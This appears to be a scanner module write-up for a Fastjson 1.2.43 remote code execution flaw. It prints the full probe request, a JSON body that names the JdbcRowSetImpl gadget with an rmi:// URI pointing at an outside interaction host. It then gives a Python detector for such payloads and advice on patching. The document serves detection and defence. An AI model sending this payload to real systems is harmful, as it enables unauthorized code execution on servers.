By kannthu
The "Fastjson 1.2.43 - Remote Code Execution" module detects a critical vulnerability in Fastjson 1.2.43. Fastjson is a Java library for parsing and generating JSON data; this module targets that specific version.
The vulnerability allows a remote attacker to execute arbitrary code on the target system, potentially leading to a complete compromise of the affected application. It should be addressed promptly to prevent unauthorized access and data breaches.
Successful exploitation gives the attacker remote code execution, which may result in unauthorized access, data manipulation, or a full takeover of the system. The consequences include exposure of sensitive information, disruption of services, and financial and reputational damage to the affected application and its users.
The "Fastjson 1.2.43 - Remote Code Execution" module works by sending a crafted HTTP request to the target system. The JSON body names a class through the "@type" key and points its "dataSourceName" at the scanner's interaction URL; a vulnerable Fastjson 1.2.43 deserializes the object and resolves that name, and the resulting out-of-band callback is what the module observes.
Here is the HTTP request sent by the module (the blank line separating headers from body is required by HTTP):
    POST / HTTP/1.1
    Host: <Hostname>
    Content-Type: application/json

    {
      "@type": "com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName": "rmi://<InteractionURL>/Exploit",
      "autoCommit": true
    }
The module also includes matching conditions to decide whether the vulnerability is present. It checks that the "dns" protocol appears among the recorded interactions for the interaction URL (that is, the target performed a DNS lookup of the scanner's hostname) and that the HTTP status code of the response is not 200. The vulnerability is reported only if both conditions hold. Note that a DNS interaction shows the target attempted to resolve the supplied name, which is strong evidence that the unsafe deserialization was triggered, but not proof that code actually ran; confirm on the host before treating the finding as verified RCE.
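As an added example (not part of the Vidoc module or of the original page), here is a request-body check a defender can run in a WAF or log pipeline to flag the probe shown above. It parses the JSON, walks nested objects and arrays, and reports every object carrying an "@type" key, marking com.sun.rowset.JdbcRowSetImpl as a known gadget class and collecting sibling string values that are JNDI-style URIs; the ldap:// scheme is a generalization beyond the rmi:// URI in the request above, and the sample bodies and hostnames are constructed.

```python
import json
import re
from typing import Any, Dict, List

# @type classes widely abused as autoType gadgets; the module above uses this one.
KNOWN_GADGETS = {"com.sun.rowset.JdbcRowSetImpl"}
# JNDI-style schemes that make the gadget resolve an attacker-chosen name
# (the page's request uses rmi://; ldap:// is a generalisation).
JNDI_URI = re.compile(r"^(rmi|ldap)://", re.IGNORECASE)


def _walk(node: Any, findings: List[Dict[str, Any]]) -> None:
    """Recursively record every JSON object that carries an @type key."""
    if isinstance(node, dict):
        cls = node.get("@type")
        if isinstance(cls, str):
            uris = [v for v in node.values() if isinstance(v, str) and JNDI_URI.match(v)]
            findings.append({"class": cls,
                             "known_gadget": cls in KNOWN_GADGETS,
                             "jndi_uris": uris})
        for child in node.values():
            _walk(child, findings)
    elif isinstance(node, list):
        for child in node:
            _walk(child, findings)


def inspect_json_body(body: str) -> List[Dict[str, Any]]:
    """Return findings for one request body; an empty list means nothing suspicious."""
    try:
        data = json.loads(body)
    except ValueError:
        # Malformed JSON is not a probe; log the parse failure separately if needed.
        return []
    findings: List[Dict[str, Any]] = []
    _walk(data, findings)
    return findings


if __name__ == "__main__":
    # Constructed samples: the module's probe with a placeholder host, and a
    # benign body of the same shape.
    probe = ('{"@type":"com.sun.rowset.JdbcRowSetImpl",'
             '"dataSourceName":"rmi://interact.example.invalid/Exploit","autoCommit":true}')
    benign = '{"dataSourceName":"jdbc:postgresql://db.internal/app","autoCommit":true}'
    for label, body in (("probe", probe), ("benign", benign)):
        print(label, inspect_json_body(body))
```

Any "@type" key is worth alerting on, since the class name alone is what makes Fastjson autoType reachable; the known-gadget flag only raises the severity.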
Regularly scan for and patch systems running Fastjson 1.2.43 to mitigate the risk of remote code execution. Upgrading to a fixed Fastjson release and keeping autoType support disabled addresses the underlying class of issue rather than only the probe this module sends.